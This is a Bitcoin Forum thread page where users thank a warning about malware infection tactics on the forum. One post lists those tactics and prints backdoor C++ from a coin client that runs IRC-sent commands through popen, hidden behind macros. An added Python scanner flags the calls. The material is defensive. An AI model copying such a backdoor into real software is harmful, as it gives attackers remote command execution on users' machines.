Bitcoin Forum
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 164057 times)
alttravel
Member
**
Offline Offline

Activity: 406
Merit: 21


View Profile
December 30, 2017, 02:17:31 PM
 #341

Thank you, really needed information. Security is a big issue here since lots of us are using hot wallets to trade on sometimes exotic platforms.
icoDealDeckcom
Newbie
*
Offline Offline

Activity: 44
Merit: 0


View Profile WWW
December 31, 2017, 08:02:40 AM
 #342

Are you telling us that on bitcointalk.org we are likely to infect our computer by clicking on some link???

That is outrageous, if the community members can't be protected maybe this forum should be shut down.
sudnokpok
Full Member
***
Offline Offline

Activity: 406
Merit: 106



View Profile
December 31, 2017, 08:26:49 PM
 #343

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
emma46
Member
**
Offline Offline

Activity: 98
Merit: 10


View Profile
January 01, 2018, 10:52:11 AM
 #344

This is so true there are kinds of malware infections that can infiltrate our computers, let alone our very own wallets. We just need to be more keen when it comes to securing our beloved coins and making sure that they will not just vanish into thin air, the same with the efforts that we have put into our earnings.

Magister Magus
Member
**
Offline Offline

Activity: 329
Merit: 35


View Profile
January 01, 2018, 11:15:26 PM
 #345

This is bad, but this kind of information is precious and I think that the sharing of useful hints should be the main aim of this forum.
So, thank you very much for your advice.

▂▂▃▅▇ EVO - THE WORLD OF SELF-DEVELOPMENT ▇▅▃▂▂
MEDIUM    ●  LINKEDIN  ●TELEGRAM ◄  Blockchain platform for assessing and developing human skills  ▶ TWITTER  ● FACEBOOK  ●
WHITEPAPER
Cryptobel
Full Member
***
Offline Offline

Activity: 420
Merit: 100



View Profile
January 02, 2018, 07:40:37 AM
 #346

Hacked wallet and took all tokens((((( Now I sit and think what we've done wrong) Thanks for the great article!!!

Shakurcrypto
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile WWW
January 02, 2018, 10:41:45 PM
 #347

Thanks
AHMADYTRADE
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
January 02, 2018, 11:41:37 PM
 #348

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Yeah, very useful forum, thanks to all of you. Greetings from Venezuela.
coininvestor
Full Member
***
Offline Offline

Activity: 128
Merit: 100


View Profile
January 03, 2018, 02:50:44 PM
 #349

Are you telling us that on bitcointalk.org we are likely to infect our computer by clicking on some link???

That is outrageous, if the community members can't be protected maybe this forum should be shut down.

I had 113,026 ARDR worth about $209,000 stolen yesterday in this way. Hacker's wallet address: ARDOR-HKCS-V6N8-FH7T-A3SLF
Felics
Newbie
*
Offline Offline

Activity: 30
Merit: 0


View Profile
January 04, 2018, 12:25:50 AM
 #350

Great post
Cubanlinx81
Member
**
Offline Offline

Activity: 376
Merit: 11

CryptoRex


View Profile
January 04, 2018, 01:15:37 AM
 #351

Thanks for the information. So many ways that hackers are trying to steal our money. I will post and share this information to help others in the community stay safe while trading or online.
Stasnislav11
Member
**
Offline Offline

Activity: 294
Merit: 10


View Profile
January 04, 2018, 08:52:01 PM
 #352

a really good topic, often people start to think about the safety of their wallets when it's too late
GunsLair
Jr. Member
*
Offline Offline

Activity: 622
Merit: 1


View Profile
January 05, 2018, 02:50:03 PM
 #353

It is dangerous even for sites to go, not to mention the downloads )))
CryptoNews1
Newbie
*
Offline Offline

Activity: 98
Merit: 0


View Profile
January 08, 2018, 08:52:38 AM
 #354

Thanks for the info
Raul Lopez
Member
**
Offline Offline

Activity: 117
Merit: 10


View Profile WWW
January 08, 2018, 10:08:07 AM
 #355

For this reason I love Bitcointalk.org. Thank you!!

■ ■ ■ ■ ■ ■ ■ Find the best price of any book. Book finder and recommendator ■ ■ ■ ■ ■ ■ ■ Libreris
AllthewayUUppp
Newbie
*
Offline Offline

Activity: 84
Merit: 0


View Profile
January 08, 2018, 07:30:38 PM
 #356

Thanks for sharing. I will be more secure from now on.
bellanas
Member
**
Offline Offline

Activity: 392
Merit: 20


View Profile
January 09, 2018, 08:45:36 AM
 #357

Thanks for the info...I hope this forum will help me to save my money from scammers. Experience unfortunately was sad already.
Bugatti73
Member
**
Offline Offline

Activity: 616
Merit: 10


View Profile
January 10, 2018, 09:55:05 AM
 #358

Can you please explain how to protect yourself from attacks? Can I put Linux and not survive? or is there a threat anyway?
Wilsonong222
Jr. Member
*
Offline Offline

Activity: 131
Merit: 5


View Profile
January 11, 2018, 02:03:05 AM
 #359

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Hi there, I would like to ask if it is safe to use incognito mode in Google Chrome. Or do I need to install a software application that blocks the malware? Thanks in advance.

(((   BIDIUM.io   )))    PRE-ICO ACTIVE
█████████  JOIN NOW!  █████████
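
Added example, not part of any post in this thread and not code from the coin in question: the backdoor quoted in post #359 reaches `popen` only through a macro name, so a text search for `popen` in the IRC handler finds nothing. The Python below resolves single-token `#define` aliases and flags process-spawning calls reached through them; the `#define` lines in `SAMPLE` are constructed from the two listings in the post, and the function names and the `DANGEROUS` list are assumptions of the example.

```python
import re

# Calls that spawn a process or shell (illustrative list, an assumption of this
# example). Peer-discovery code has no reason to reach any of them.
DANGEROUS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
             "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec"}
DEFINE = re.compile(r"^\s*#\s*define\s+(\w+)\s+(\w+)\s*$")  # object-like, one token
STRING = re.compile(r'"(?:\\.|[^"\\])*"')
IDENT = re.compile(r"\b[A-Za-z_]\w*")
# Constructed sample: the #define lines are inferred from the two listings in
# the post; the project's real header is not shown on the page.
SAMPLE = '''#define CLine FILE
#define CRead popen
#define CFree pclose
#define CBuff "PRIVMSG"
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");'''


def resolve_aliases(source):
    """Map each single-token macro to the identifier it finally expands to."""
    direct = dict(m.groups() for m in map(DEFINE.match, source.splitlines()) if m)
    resolved = {}
    for name in direct:
        target, seen = name, set()
        while target in direct and target not in seen:  # follow chains, stop on cycles
            seen.add(target)
            target = direct[target]
        resolved[name] = target
    return resolved


def find_hidden_exec(source):
    """Return (line_no, name_as_written, resolved_call) for each spawning call."""
    aliases = resolve_aliases(source)
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE.match(line):
            continue  # an alias is reported at the line where it is used
        code = STRING.sub('""', line).split("//", 1)[0]  # drop literals, comments
        for ident in IDENT.findall(code):
            if aliases.get(ident, ident) in DANGEROUS:
                hits.append((no, ident, aliases.get(ident, ident)))
    return hits

if __name__ == "__main__":
    for hit in find_hidden_exec(SAMPLE):
        print("line %d: %s resolves to %s" % hit)
```

Function-like macros and token pasting are not resolved here; running the real preprocessor over the file and scanning its output covers those cases.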
Hemady17
Member
**
Offline Offline

Activity: 350
Merit: 32

XETHER - BET ON HONESTY!!!


View Profile
January 11, 2018, 07:59:51 AM
 #360

Increasing malware infection is a very unfortunate experience. But based on my experience, every one of us needs to understand why they flourish even though we secure our systems. Malware is a business for some people. From that perspective we should change our mindset and do our best to protect our interests. For our part, we should increase our level of knowledge on how to fight the malware.
